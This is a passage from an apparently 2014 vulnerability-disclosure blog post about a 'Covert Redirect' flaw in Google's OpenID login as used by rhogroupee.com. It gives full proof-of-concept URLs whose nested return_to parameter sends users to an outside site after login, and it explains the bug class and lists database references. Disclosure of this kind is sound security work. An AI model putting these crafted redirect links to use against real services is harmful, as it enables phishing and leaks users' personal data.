http://www.rhogroupee.com/join/context/GENERAL/redirect/http%3A%2F%2Fwww.tetraph.com%2Fessayjeans%2Fpoems%2Fdistance.html
Vulnerable URL from Google that is related to rhogroupee.com:
https://www.google.com/accounts/o8/ud?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.return_to=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp%3Fredirect%3Dhttp%253A%252F%252Fwww.rhogroupee.com%252Fuser-social-network-login%252FauthProvider%252F10%252Fredirect%252Fhttp%25253A%25252F%25252Fwww.rhogroupee.com%25252Fabout&openid.realm=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp&openid.aOpenIDc_handle=1.AMlYA9UWc8Nk_QfiFEpKcE9A7qm0ErEkNLgQcbOwTR_aLdEyFS4ybtZQ_V9-4ARxUqsGIpPFtRd9Mw&openid.mode=checkid_setup&openid.ns.ext1=http%3A%2F%2Fopenid.net%2Fextensions%2Fsreg%2F1.1&openid.ext1.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fsreg%2F1.0&openid.sreg.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.ext3=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ext3.mode=fetch_request&openid.ext3.type.Username=http%3A%2F%2Fschema.openid.net%2FnamePerson%2Ffriendly&openid.ext3.type.Email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.ext3.type.Birth+date=http%3A%2F%2Fschema.openid.net%2FbirthDate&openid.ext3.type.Gender=http%3A%2F%2Fschema.openid.net%2Fperson%2Fgender&openid.ext3.type.Country=http%3A%2F%2Fschema.openid.net%2Fcontact%2Fcountry%2Fhome&openid.ext3.required=Username%2CEmail%2CBirth+date%2CGender%2CCountry
POC:
https://www.google.com/accounts/o8/ud?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.return_to=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp%3Fredirect%3Dhttp%253A%252F%252Fwww.rhogroupee.com%252Fjoin%252Fcontext%252FGENERAL%252Fredirect%252Fhttp%25253A%25252F%25252Fwww.tetraph.com%25252Fessayjeans%25252Fpoems%25252Fdistance.html&openid.realm=http%3A%2F%2Fwww.rhogroupee.com%2FopenIdRp&openid.aOpenIDc_handle=1.AMlYA9UWc8Nk_QfiFEpKcE9A7qm0ErEkNLgQcbOwTR_aLdEyFS4ybtZQ_V9-4ARxUqsGIpPFtRd9Mw&openid.mode=checkid_setup&openid.ns.ext1=http%3A%2F%2Fopenid.net%2Fextensions%2Fsreg%2F1.1&openid.ext1.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fsreg%2F1.0&openid.sreg.optional=nickname%2Cemail%2CemailVerified%2Cdob%2Cgender%2Ccountry&openid.ns.ext3=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ext3.mode=fetch_request&openid.ext3.type.Username=http%3A%2F%2Fschema.openid.net%2FnamePerson%2Ffriendly&openid.ext3.type.Email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.ext3.type.Birth+date=http%3A%2F%2Fschema.openid.net%2FbirthDate&openid.ext3.type.Gender=http%3A%2F%2Fschema.openid.net%2Fperson%2Fgender&openid.ext3.type.Country=http%3A%2F%2Fschema.openid.net%2Fcontact%2Fcountry%2Fhome&openid.ext3.required=Username%2CEmail%2CBirth+date%2CGender%2CCountry
(2.3) The following URL have the same vulnerabilities.
https://accounts.google.com/o/openid2/auth?openid.ns=http://specs.openid.net/auth/2.0&openid.claimed_id=http://specs.openid.net/auth/2.0/identifier_select&openid.identity=http://specs.openid.net/auth/2.0/identifier_select&openid.return_to=http://www.rhogroupee.com/openIdRp?redirect%3Dhttp%253A%252F%252Fwww.rhogroupee.com%252Fuser-social-network-login%252FauthProvider%252F10%252Fredirect%252Fhttp%25253A%25252F%25252Fwww.rhogroupee.com&openid.realm=http://www.rhogroupee.com/openIdRp&openid.aOpenIDc_handle=1.AMlYA9VvMT-wTbwpTyi--6hxkiyJYb7Oou8Wt0nqDPzqfNZBqTsNOXWhVorwkAAIZmnQXwswhZYZYQ&openid.mode=checkid_setup&openid.ns.ext1=http://openid.net/extensions/sreg/1.1&openid.ext1.optional=nickname,email,emailVerified,dob,gender,country&openid.ns.sreg=http://openid.net/sreg/1.0&openid.sreg.optional=nickname,email,emailVerified,dob,gender,country&openid.ns.ext3=http://openid.net/srv/ax/1.0&openid.ext3.mode=fetch_request&openid.ext3.type.Username=http://schema.openid.net/namePerson/friendly&openid.ext3.type.Email=http://schema.openid.net/contact/email&openid.ext3.type.Birth+date=http://schema.openid.net/birthDate&openid.ext3.type.Gender=http://schema.openid.net/person/gender&openid.ext3.type.Country=http://schema.openid.net/contact/country/home&openid.ext3.required=Username,Email,Birth+date,Gender,Country
POC Video:
https://www.youtube.com/watch?v=GyNGBuHNoJ0
Blog Detail:
http://tetraph.blogspot.com/2014/05/google-openid-covert-redirect.html
(3) What is Covert Redirect?
Covert Redirect is a class of security bugs disclosed in May 2014. It is an application that takes a parameter and redirects a user to the parameter value without sufficient validation. This often makes use of Open Redirect and XSS (Cross-site Scripting) vulnerabilities in third-party applications.
Covert Redirect is also related to single sign-on. It is known by its influence on OAuth and OpenID. Hacker may use it to steal users' sensitive information. Almost all OAuth 2.0 and OpenID providers worldwide are affected. Covert Redirect can work together with CSRF (Cross-site Request Forgery) as well. After Covert Redirect was published, it is kept in some common databases such as SCIP, OSVDB, Bugtraq, and X-Force. Its scipID is 13185, while OSVDB reference number is 106567. Bugtraq ID: 67196. X-Force reference number is 93031.
Discover and Reporter:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)
Related Articles:
http://tetraph.com/security/covert-redirect/google-openid-covert-redirect-vulnerability/
https://twitter.com/tetraphibious/status/559169163394940929
https://hackertopic.wordpress.com/2014/08/06/google-service-exploit/
http://www.inzeed.com/kaleidoscope/covert-redirect/google-openid-covert-redirect-vulnerability/
http://tetraph.blog.163.com/blog/static/23460305120144385547287/
http://securitypost.tumblr.com/post/119439859067/itinfotech-id-oauth
http://securityrelated.blogspot.com/2014/06/google-web-service-bug.html
http://whitehatpost.lofter.com/post/1cc773c8_706b637
https://tetraph.wordpress.com/2014/07/11/google-service-exploit/
http://computerobsess.blogspot.com/2014/06/google-web-service-bug.html
Labels:
0-day,
Computer Science,
Covert_Redirect,
Cyber Tech,
Google,
Hacker Prevention,
Information Leakage,
IT Information,
Open Redirect,
OpenID,
Phishing Bug,
Spam Attack,
vulnerability,
Web Attack,
Website Test
Subscribe to:
Posts (Atom)







